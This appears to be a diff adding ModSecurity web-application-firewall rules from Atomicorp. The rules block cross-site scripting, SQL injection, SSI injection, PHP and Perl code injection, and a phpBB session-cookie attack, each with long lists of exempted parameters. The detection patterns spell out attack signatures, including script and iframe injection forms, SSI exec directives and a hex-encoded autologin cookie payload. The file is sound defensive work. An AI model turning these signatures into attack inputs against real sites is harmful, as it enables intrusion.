+SecRule ARGS|REQUEST_HEADERS:X_FORWARDED_FOR|ARGS_NAMES|!ARGS:input_65|!ARGS:/^cont/|!ARGS:/introtext/|!ARGS:_message|!ARGS:/com_liferay/|!ARGS:/fbmcc/|!ARGS:/refuse_code/|!ARGS:/ide_/|!ARGS:/bsr_/|!ARGS:nav-menu-data|!ARGS:/sc_stats/|!ARGS:/contact_map/|!ARGS:/adsense/|!ARGS:rtel|!ARGS:/TextArea/|!ARGS:/^dbem/!ARGS:insp_code|!ARGS:/marketing_code/|!ARGS:addthis|!ARGS:/option_tree/|!ARGS:/go_code/|!ARGS:/custom/|!ARGS:/shortcode/|!ARGS:/analitics/|!ARGS:/area_id/|!ARGS:/_head_/|!ARGS:/theme/|!ARGS:/ga_code/|!ARGS:/analytic/|!ARGS:/_js_/|!ARGS:/schema/|!ARGS:/^ifeature/|!ARGS:/^redux/|!ARGS:/analyticscode/|!ARGS:/suffix/|!ARGS:/sadrzaj/|!ARGS:js_includes|!ARGS:/m1_source/|!ARGS:/geodir/|!ARGS:/suffix/|!ARGS:/banner_block/|!ARGS:/introcopy/|!ARGS:ausgabe|!ARGS:eingabe|!ARGS:/previewdata/|!ARGS:/tracking_extra/|!ARGS:SAMLResponse|!ARGS:/^groups/|!ARGS:video|!ARGS:/google_map/|!ARGS:/gacode/|!ARGS:code1|!ARGS:sotenson|!ARGS:ga_code|!ARGS:customized|!ARGS:code_analytics|!ARGS:uvod|!ARGS:/^field_video/|!ARGS:q|!ARGS:/^textarea-video/|!ARGS:leirro|!ARGS:lomake|!ARGS:vastaus|!ARGS:vraag|!ARGS:qti_data|!ARGS:tracklist|!ARGS:i_google|!ARGS:code_area_text|!ARGS:/log_code/|!ARGS:/^ADVERT_/|!ARGS:UserData|!ARGS:areas|!ARGS:templatecode|!ARGS:/prevObject/|!ARGS:/replaceAll/|!ARGS:/insertBefore/|!ARGS:/insertAfter/|!ARGS:/prependTo/|!ARGS:/appendTo/|!ARGS:/mapcode/|!ARGS:googleCode|!ARGS:/^recipient/|!ARGS:optional_head|!ARGS:/^form/|!ARGS:/^var_value/|!ARGS:variable_data|!ARGS:/customfield/|!ARGS:val333|!ARGS:notice|!ARGS:/formcode/|!ARGS:/ajax/|!ARGS:all|!ARGS:allowedTags|!ARGS:/tracking/|!ARGS:/google_analytics/|!ARGS:/widget/|!ARGS:ad_code|!ARGS:/jscode/|!ARGS:postcontents|!ARGS:/keycaptcha_code/|!ARGS:video1|!ARGS:/updateAds/|!ARGS:map|!ARGS:gmapcode|!ARGS:/^Sidebar/|!ARGS:/^wpTextbox/|!ARGS:paragrafo|!ARGS:/question/|!ARGS:/style/|!ARGS:sidebar|!ARGS:analyticscode|!ARGS:top_news|!ARGS:tracking_code|!ARGS:data[config]|!ARGS:fulltext|!ARGS:introtext|!ARGS:offertext|!ARGS:block|!ARGS:livezillacode|!ARGS:whats-new|!ARGS:/embed/|!ARGS:/desc/|!ARGS:/sidebar/|!ARGS:/ad_code/|!ARGS:/footer/|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/wyscms/|!ARGS:/script/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:/^field_/|!ARGS:match_report|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:/^instance/|!ARGS:sml_prt_1|!ARGS:pay_inst_1|!ARGS:/^jform/|!ARGS:eip_value|!ARGS:phpcode|!ARGS:intro|!ARGS:/product_benefits/|!ARGS:Snippet|!ARGS:_qf_Select_next|!ARGS:move2|!ARGS:oid|!ARGS:Submit2|!ARGS:layout|!ARGS:pageset|!ARGS:contact_form_information|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:move2|!ARGS:input[Desarrollo]|!ARGS:hoperation|!ARGS:arg2|!ARGS:login_form|!ARGS:resumoDetalhe|!ARGS:Right_photo_1|!ARGS:/^K2ExtraField/|!ARGS:bbcode_tpl|!ARGS:embedVideo|!ARGS:/submitcode/|!ARGS:mentorhelp|!ARGS:/custom_code/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^fck/|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:/signature/|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:guardar|!ARGS:/VB_announce/|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:embeddump|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:query|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:verbiage|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:preview__hidden|!ARGS:order|!ARGS:youtube|!ARGS:/post/|!ARGS:reply|!ARGS:business|!ARGS:navig|!ARGS:/pagimenu/|!ARGS:/^jms/|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/|!ARGS:/infobox/  "(?:< ?/? ?script|< ?(?:i?frame ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|zlib|(ht|f)tps?)\:/|document\.write ?\(|(?:<|< ?/) ?(?:(?:java|vb)script|applet|activex|chrome|qx?ss|embed)|< ?/?i?frame\b|< ?img src ?=|< ?base href ?=)" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:removeNulls,t:utf8tounicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhiteSpace,t:lowercase,multiMatch,id:340148,rev:162,severity:2,msg:'Atomicorp.com WAF Rules: Potential Cross Site Scripting Attack',logdata:'%{TX.0}'"
+
+SecRule REQUEST_BODY "^< ?\??( |\+)?xml" "phase:2,id:333706,pass,t:none,t:urlDecodeUni,t:lowercase,nolog,noauditlog,skipAfter:END_XSS_ATTACKS_D2"
+
+# Rule 350148:  potentially malicious web code with multimatch checks
+SecRule REQUEST_URI "!(?:/admin/(?:[a-z]+/(?:save|module/update/|edit)|publish|\?op=edit|content/update|appearance/settings/|d/1/|pages/update|block_edit)|/secure/roundcube/|/edit/|/backend\.php/property/save|/home/add|/\?act=edit|/site-content/|/project/update/|/index\.php\?option=com_(?:easyblog|resource&controller=article|comprofiler&task=my_profile|aclassif)|/index.php/datafeedmanager/adminhtml_datafeedmanager/save|/index\.php\?mode=(?:new|edit)story|^/filemanager/filemanager\.php|^/user_info/edit_profile/|/admin/editor/|^/user.php\?op=edituser&htmltext=|^/admin/structure/|option=com_rsform&task=forms\.edit|^/ndxz-?studio/\?a=|^/support/agent|^/elements/save|^/settings/in_place_save/|^/ndxz2/|^/([a-z]+/)?index\.php/admin/s(?:ystem_config|ubject)/|^/(a-z)+/admin/programs/update_program|^/backoffice/\?op=edit|^/za/zcadm|^/efthuko\.php\?mod=editnews|^/mm-panel/index\.php|/ndxzstudio/|destination=admin/structure|/smart_forms/live/save_section\.php|^/mod_pagespeed|^/\?q=admin/appearance/settings|^/articles/(?:save|edit|add)|^/\?ptype=|/whmadmcp/addonmodules\.php|^/sh/file/|/multimediasave\.do|^/cms/|^/panel/index\.php|^/posts/edit|^/teksty/edytuj_akapit|^/egisportal/|/templatesavechanges|^/\?_task=mail|^/cpsess[0-9]+/scripts2?/|control_panel/manage\?p_p_id=com_liferay|^/[a-z0-9]+?/?admin[a-z0-9]+?/index\.php\?controller=admin|/wp-admin/edit\.php\?post_type=event&page=events-manager-options)" "capture,phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:lowercase,capture,id:350148,rev:169,severity:2,msg:'Atomicorp.com WAF Rules: Potentially Untrusted Web Content Detected ',logdata:'%{TX.0},%{matched_var}'"
+SecRule ARGS|!ARGS:cont|!ARGS:/^addon/|!ARGS:/comenter/|!ARGS:/contenu/|!ARGS:/motd/|!ARGS:styles|!ARGS:/background/|!ARGS:/^go/|!ARGS:/overlay/|!ARGS:raw|!ARGS:accesshash|!ARGS:AUTOR01|!ARGS:/ads?code/|!ARGS:third_party_code|!ARGS:/partial/|!ARGS:/adsense/|!ARGS:/bericht/|!ARGS:whereOptions|!ARGS:/what/|!ARGS:/mensaje/|!ARGS:opis|!ARGS:/wyswie/|!ARGS:/cbPay/|!ARGS:dims|!ARGS:/__dnn/|!ARGS:/social/|!ARGS:/pfield/|!ARGS:/rules/|!ARGS:/go_code/|!ARGS:/app_list/|!ARGS:/^epp/|!ARGS:/shortcode/|!ARGS:/^akID/|!ARGS:/area_id/|!ARGS:head|!ARGS:tpl|!ARGS:export|!ARGS:/object/|!ARGS:cont|!ARGS:/custom/|!ARGS:/terms/|!ARGS:/snippet/|!ARGS:omesg|!ARGS:/google/|!ARGS:/geodir/|!ARGS:tele|!ARGS:code|!ARGS:dt|!ARGS:/color/|!ARGS:/theme/|!ARGS:/center/|!ARGS:/widget/|!ARGS:/^value/|!ARGS:/^custom/|!ARGS:/pass/|!ARGS:repair|!ARGS:/definition/|!ARGS:/daten/|!ARGS:/subject/|!ARGS:nw_brief|!ARGS:/Beschreibung/|!ARGS:process|!ARGS:/introcopy/|!ARGS:ausgabe|!ARGS:eingabe|!ARGS:Lead|!ARGS:/desc/|!ARGS:/itinerary/|!ARGS:/included/|!ARGS:/destination/|!ARGS:/training/|!ARGS:/^room_/|!ARGS:aname|!ARGS:/Education/|!ARGS:/wp_autosave/|!ARGS:return_to|!ARGS:/^profile_/|!ARGS:/^utm_/|!ARGS:ad|!ARGS:namestyle|!ARGS:/ULTIMATUM/|!ARGS:/^mce_/|!ARGS:/uutinen/|!ARGS:/agree/|!ARGS:/artwork/|!ARGS:/overview/|!ARGS:/_section_/|!ARGS:/Button/|!ARGS:/^prod/|!ARGS:btnApply|!ARGS:/^VALUE\[1\]$/|!ARGS:/^system/|!ARGS:/gacode/|!ARGS:sample|!ARGS:/source_code/|!ARGS:/Settings/|!ARGS:code1|!ARGS:sotenson|!ARGS:view|!ARGS:record_json|!ARGS:geweest|!ARGS:send|!ARGS:pressestimmen|!ARGS:name|!ARGS:imagemap|!ARGS:/^extra/|!ARGS:afbeelding|!ARGS:action_name|!ARGS:nieuwsbrief|!ARGS:/locatie/|!ARGS:ingredients|!ARGS:priceField|!ARGS:inhoud|!ARGS:op|!ARGS:f_main|!ARGS:/error/|!ARGS:uvod|!ARGS:/^field_/|!ARGS:customized|!ARGS:/fullnews/|!ARGS:/^textarea-video/|!ARGS:komentar|!ARGS:/_layout_/|!ARGS:/^FieldValue/|!ARGS:/includes/|!ARGS:areacomum|!ARGS:lomake|!ARGS:vastaus|!ARGS:target|!ARGS:vraag|!ARGS:areaprivativa|!ARGS:qti_data|!ARGS:tracklist|!ARGS:i_google|!ARGS:quote|!ARGS:/^help_/|!ARGS:/^ADVERT_/|!ARGS:userdata|!ARGS:source|!ARGS:sisalto|!ARGS:reg_rules|!ARGS:areas|!ARGS:code_area_text|!ARGS:datos|!ARGS:templatecode|!ARGS:/sidebar/|!ARGS:/ad_code/|!ARGS:mes|!ARGS:json|!ARGS:wpreason|!ARGS:extended|!ARGS:/Kirjoitukset/|!ARGS:/x_line_item/|!ARGS:item_list|!ARGS:/^var_value/|!ARGS:valori|!ARGS:/pimage/|!ARGS:/^instance/|!ARGS:/allowedTags/|!ARGS:/^button/|!ARGS:/^zcck/|!ARGS:/accommodation/|!ARGS:/^breves/|!ARGS:/restaurant/|!ARGS:/testimonial/|!ARGS:headstone|!ARGS:/^book/|!ARGS:/log/|!ARGS:/metatags/|!ARGS:/^customfield/|!ARGS:/embed/|!ARGS:/leftcol/|!ARGS:/rightcol/|!ARGS:feature|!ARGS:/banner/|!ARGS:cb_talks|!ARGS:/synopsis/|!ARGS:/^fields/|!ARGS:notice|!ARGS:/formcode/|!ARGS:val333|!ARGS:receipt_address|!ARGS:changedept|!ARGS:/teaser/|!ARGS:EnTrar|!ARGS:cv|!ARGS:dati|!ARGS:/qualification/|!ARGS:/results/|!ARGS:/experience/|!ARGS:/plan/|!ARGS:/detail/|!ARGS:log|!ARGS:do|!ARGS:narrative|!ARGS:/promo/|!ARGS:/offer/|ARGS_NAMES|!ARGS:do|!ARGS:/^bt_|!ARGS:/short/|!ARGS:perex|!ARGS:/contact/|!ARGS:advanced|!ARGS:/google_analytics/|!ARGS:/bio/|!ARGS:rules|!ARGS:meta|!ARGS:/next/|!ARGS:ad_code|!ARGS:review|!ARGS:/feed/|!ARGS:/bbclosed/|!ARGS:/observacao/|!ARGS:/caption/|!ARGS:logoutRequest|!ARGS:/js_payload/|!ARGS:video1|!ARGS:/abstract/|!ARGS:/para/|!ARGS:/highlight/|!ARGS:/config/|!ARGS:/welcome/|!ARGS:des|!ARGS:/notice/|!ARGS:structure|!ARGS:/table/|!ARGS:tag|!ARGS:romancode|!ARGS:model|!ARGS:pwd|!ARGS:thecode|!ARGS:/tweet/|!ARGS:do|!ARGS:/^input_/|!ARGS:dhltrack|!ARGS:reflection|!ARGS:media|!ARGS:rqst|!ARGS:blurb|!ARGS:/OSDCS/|!ARGS:Thankyou|!ARGS:img_alt|!ARGS:waarde|!ARGS:/statement/|!ARGS:continue|!ARGS:/writing/|!ARGS:drugs|!ARGS:text1|!ARGS:terms|!ARGS:/announ/|!ARGS:/^eeta-/|!ARGS:/^News/|!ARGS:main|!ARGS:notes|!ARGS:validatepromo|!ARGS:payment_sel|!ARGS:request|!ARGS:copy|!ARGS:/MapField/|!ARGS:/email/|!ARGS:/admin/|!ARGS:profile|!ARGS:contenu|!ARGS:/suffix/|!ARGS:/prefix/|!ARGS:pc_main|!ARGS:/instructions/|!ARGS:/submit/|!ARGS:/title/|!ARGS:/xjxargs/|!ARGS:/info/|!ARGS:nav|!ARGS:recompose|!ARGS:compose|!ARGS:/^bname/|!ARGS:/^property/|!ARGS:groupWelcomeScreen|!ARGS:block|!ARGS:xsym_sym_brief|!ARGS:langbericht|!ARGS:btnCheckout|!ARGS:lease|!ARGS:/^copyright/|!ARGS:creategallery|!ARGS:cleaning|!ARGS:/reply/|!ARGS:/^gui/|!ARGS:/sig/|!ARGS:/Import_Cell/|!ARGS:livezillacode|!ARGS:/^bbcode/|!ARGS:_cc|!ARGS:resume|!ARGS:next|!ARGS:addtoclass|!ARGS:/intro/|!ARGS:registration_discounts|!ARGS:/opportunit/|!ARGS:registration_prices|!ARGS:workshop|!ARGS:venue|!ARGS:/^mainman/|!ARGS:features|!ARGS:/problem/|!ARGS:subhead|!ARGS:agenda|!ARGS:/question/|!ARGS:/answer/|!ARGS:entry|!ARGS:/form/|!ARGS:/footer/|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/wyscms/|!ARGS:/script/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:/description/|!ARGS:/report/|!ARGS:/product_desc/|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:sml_prt_1|!ARGS:pay_inst_1|!ARGS:/^jform/|!ARGS:eip_value|!ARGS:phpcode|!ARGS:/product_benefits/|!ARGS:Snippet|!ARGS:/^_qf_/|!ARGS:move2|!ARGS:oid|!ARGS:Submit2|!ARGS:layout|!ARGS:pageset|!ARGS:/^site_/|!ARGS:/translation/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:move2|!ARGS:input[Desarrollo]|!ARGS:hoperation|!ARGS:arg2|!ARGS:login_form|!ARGS:resumoDetalhe|!ARGS:Right_photo_1|!ARGS:/^K2ExtraField/|!ARGS:bbcode_tpl|!ARGS:/embed/|!ARGS:/submitcode/|!ARGS:mentorhelp|!ARGS:/custom_code/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^fck/|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:guardar|!ARGS:/VB_announce/|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:/solution/|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:query|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:verbiage|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:preview__hidden|!ARGS:order|!ARGS:youtube|!ARGS:/post/|!ARGS:reply|!ARGS:business|!ARGS:navig|!ARGS:/submenu/|!ARGS:/pagimenu/|!ARGS:/^jms/|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/|!ARGS:/senior/  "(?:< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|zlib|(?:ht|f)tps?)\:/|(?:alert|document\.write) ?\(|<? (?:(?:java|vb)?script|applet|activex|chrome) ?>|< ?/?i?frame|\' ?\} ?\) ?;)"  "t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:removeComments,t:compressWhitespace,t:lowercase,multiMatch,chain"
+SecRule MATCHED_VARS "!@rx ((?:submit(?:\+| )?(request)?(?:\+| )?>+|<<(?:\+| )remove|(?:sign ?in|log ?(?:in|out)|next|add|envoyer|modifier|select|continue|weiter|account|results)(?:\+| )?>+)$|^< ?\??(?: |\+)?xml|^<samlp|^>> ?$)"  "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace"
+#SecRule MATCHED_VARS "!((submit(\+| )?(request)?(\+| )?>>$|<<(\+| )remove|(sign ?in|login|next|add|continue|weiter|account|results)?(\+| )?>>)$|^< ?\??( |\+)?xml|^<samlp)"  "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace"
+
+SecMarker END_XSS_ATTACKS_D2
+
+
+SecMarker END_XSS_ATTACKS_2
+
+# Rule 380000: phpbb Session Cookie
+#SecRule REQUEST_COOKIES:sessionid|REQUEST_URI|ARGS|REQUEST_BODY  "phpbb2mysql_data=a\x3A2\xaa\x7bs\x3A11\x3A\x22autologinid\x22\x3bb\x3A1\x3bs\x3A6\x3A\x22userid\x22\x3bs\x3A1\x3A\x222\x22\x3b\x7d" 	"id:380000,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: PHP session cookie attack'"
+
+SecRule REQUEST_URI|ARGS|REQUEST_BODY|!ARGS:areas|!ARGS:templatecode "@pm 3A 3D 3C 3E 6F 4F x72 x52 x27" "id:333843,phase:2,t:none,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:334390,t:none,pass,nolog,noauditlog,skipAfter:END_MISC_CHECKS"
+
+# Rule 380002: schema overflow attempt
+SecRule REQUEST_URI|ARGS|!ARGS:areas|!ARGS:templatecode "\|3A\|///^[^\/]{14,}?\x3A\/\/" "phase:2,deny,log,auditlog,status:403,t:none,id:380002,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: PHP session cookie attack'"
+
+SecRule REQUEST_URI "(?:/admin/artwork/index/upload_file|^/back/index\.php\?controller=admin|^/eprocservice/supplierinboundservice|^/manage/[a-z0-9]+/edit/|^/[a-z0-9/]+?\?fl_builder)" "phase:2,id:334392,t:none,t:lowercase,pass,nolog,noauditlog,skipAfter:END_380006"
+
+# Rule 380006: XSS generic sig
+SecRule REQUEST_URI|ARGS|!ARGS:slider|!ARGS:areas|!ARGS:templatecode|!ARGS:element|!ARGS:payment-details-data|!ARGS:/message/|!ARGS:/^widget-text/|!ARGS:message|!ARGS:text|!ARGS:filecontent|!ARGS:/descrip/|!ARGS:wpTextbox1 "/(\x3D|=)[^\n]*(\x3C|<)[^\n]+(\x3E|>)" "phase:2,capture,deny,log,auditlog,status:403,t:none,id:380006,rev:11,severity:2,msg:'Atomicorp.com WAF Rules: XSS Generic attack',logdata:'%{TX.0}'"
+SecMarker END_380006
+
+# Rule 380007: generic SQL injection sigs using PCRE
+SecRule REQUEST_URI "!(/immagini/)"  "phase:2,deny,log,auditlog,status:403,chain,t:none,t:lowercase,id:380007,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: SQL Inject Generic signature',tag:'SQLi'"
+SecRule REQUEST_URI|ARGS|!ARGS:areas|!ARGS:templatecode "/\w*(\x27|\’)(\x6f|o|\x4f)(\x72|r|\x52).*!(\.(jpe?g|png|bmp|gif|mpe?g|avi|flv|wmv|ico)$)" 
+
+SecMarker END_MISC_CHECKS
+
+
+################### SSI injection #############################
+#
+SecRule ARGS|ARGS_NAMES|REQUEST_HEADERS|XML:/*|!ARGS:areas|!ARGS:/template/ "@pm echo exec printenv include cmd" "id:333844,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:334391,t:none,pass,nolog,noauditlog,skipAfter:END_SSI_ATTACKS"
+
+SecRule ARGS|ARGS_NAMES|REQUEST_HEADERS|XML:/*|!ARGS:areas|!ARGS:templatecode|!ARGS:/description/|!ARGS:/text/|!ARGS:/message/|!ARGS:/msg/|!ARGS:content "<!--\W*?#\W*?(?:e(?:cho|xec)|printenv|include|cmd)" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,msg:'Atomicorp.com WAF Rules: SSI injection Attack',id:'380016',rev:3,logdata:'%{TX.0}',severity:'2'"
+#SecRule REQUEST_HEADERS|XML:/* "<!--\W*?#\W*?(?:e(?:cho|xec)|printenv|include|cmd)"         "phase:2,capture,t:none,t:htmlEntityDecode,t:lowercase,status:501,msg:'Atomicorp.com WAF Rules: SSI injection Attack',id:'380017',logdata:'%{TX.0}',severity:'2'"
+#
+SecMarker END_SSI_ATTACKS
+
+################### PERL injection #############################
+##
+#SecRule REQUEST_FILENAME "\.(?:(?:m|j)pe?g4?|bmp|tiff?|p(?:(?:p|g|b)m|n(?:g|m)|df)|gif|js|css|ico|avi|flv|w(?:m(?:v|a)|ebp)|mp(?:3|4)|cgm|svg|swf|og(?:m|v|x)|doc|xls|od(?:t|s)|ppt|wbk)$" phase:2,id:333845,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_PERL_INJECTION_3
+#
+#SecRule ARGS|REQUEST_URI|XML:/* "@pm .pl |( =* ))"        "id:333846,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceComments,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
+#        SecAction phase:2,id:334392,t:none,pass,nolog,noauditlog,skipAfter:END_PERL_INJECTION_1
+#
+#SecRule ARGS|REQUEST_URI_RAW|XML:/*|!ARGS:/jform/ "(?:\.pl\?\w+=\w?\|\w+;)|(?:\|\(\w+=\*)|(?:\*\s*\)+\s*;)" "phase:2,deny,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceComments,t:compressWhiteSpace,t:lowercase,auditlog,msg:'Atomicorp.com WAF Rules: Perl echo shellcode injection',id:380021,rev:2,logdata:'%{TX.0}',severity:'2',"
+#SecMarker END_PERL_INJECTION_1
+#
+#SecRule ARGS|REQUEST_URI_RAW|XML:/* "@pm .pl |( =* ))"        "id:333847,phase:2,t:none,t:replaceComments,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
+#        SecAction phase:2,id:334393,t:none,pass,nolog,noauditlog,skipAfter:END_PERL_INJECTION_2
+#
+#SecRule ARGS|REQUEST_URI_RAW|XML:/*|!ARGS:/jform/ "(?:\.pl\?\w+=\w?\|\w+;)|(?:\|\(\w+=\*)|(?:\*\s*\)+\s*;)" "phase:2,deny,status:403,capture,t:none,t:replaceComments,t:compressWhiteSpace,t:lowercase,auditlog,msg:'Atomicorp.com WAF Rules: Perl echo shellcode injection',id:380022,rev:2,logdata:'%{TX.0}',severity:'2',"
+#SecMarker END_PERL_INJECTION_2
+#
+#SecRule REQUEST_BODY|REQUEST_URI_RAW|XML:/* "@pm .pl |( =* ))"        "id:333848,phase:2,t:none,pass,nolog,noauditlog,skip:1"
+#        SecAction phase:2,id:334394,t:none,pass,nolog,noauditlog,skipAfter:END_PERL_INJECTION_3
+#
+#SecRule ARGS|REQUEST_URI_RAW|XML:/*|!ARGS:/jform/ "(?:\.pl\?\w+=\w?\|\w+;)|(?:\|\(\w+=\*)|(?:\*\s*\)+\s*;)" "phase:2,deny,status:403,capture,t:none,t:replaceComments,t:compressWhiteSpace,t:lowercase,auditlog,msg:'Atomicorp.com WAF Rules: Perl echo shellcode injection',id:380121,rev:2,logdata:'%{TX.0}',severity:'2',"
+#SecMarker END_PERL_INJECTION_3
+
+#Simple PHP injection rules
+##TODO: Add in more exclusions
+#code injection attempt
+#SecRule REQUEST_BODY|REQUEST_URI_RAW|XML:/*  "< ?[?%] ?php ?.*[\"\(@]" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceComments,t:compressWhiteSpace,t:lowercase,capture,auditlog,msg:'Atomicorp.com WAF Rules: PHP code injection attempt',id:340852,rev:1,logdata:'%{TX.0}',severity:'2'"
+#
+##code injection attempt
+#SecRule REQUEST_BODY|REQUEST_URI_RAW|XML:/*  "< ?[?%] ?php ?.*[\"\(@]" "t:none,t:replaceComments,t:compressWhiteSpace,t:lowercase,capture,auditlog,msg:'Atomicorp.com WAF Rules: PHP code injection attempt - base64 encoded',id:340853,rev:1,logdata:'%{TX.0}',severity:'2'"
+#
+##code injection attempt
+#SecRule REQUEST_BODY|REQUEST_URI_RAW|XML:/*  "< ?[?%] ?php ?.*[\"\(@]" "t:none,t:replaceComments,t:compressWhiteSpace,t:lowercase,capture,auditlog,msg:'Atomicorp.com WAF Rules: PHP code injection attempt - hex encoded',id:340854,rev:1,logdata:'%{TX.0}',severity:'2'"
+
+Secrule REQUEST_URI "^/eprocservice/supplierinboundservice" "phase:2,id:346358,t:none,t:lowercase,pass,nolog,noauditlog,skipAfter:END_340213"
+#LDAP injection
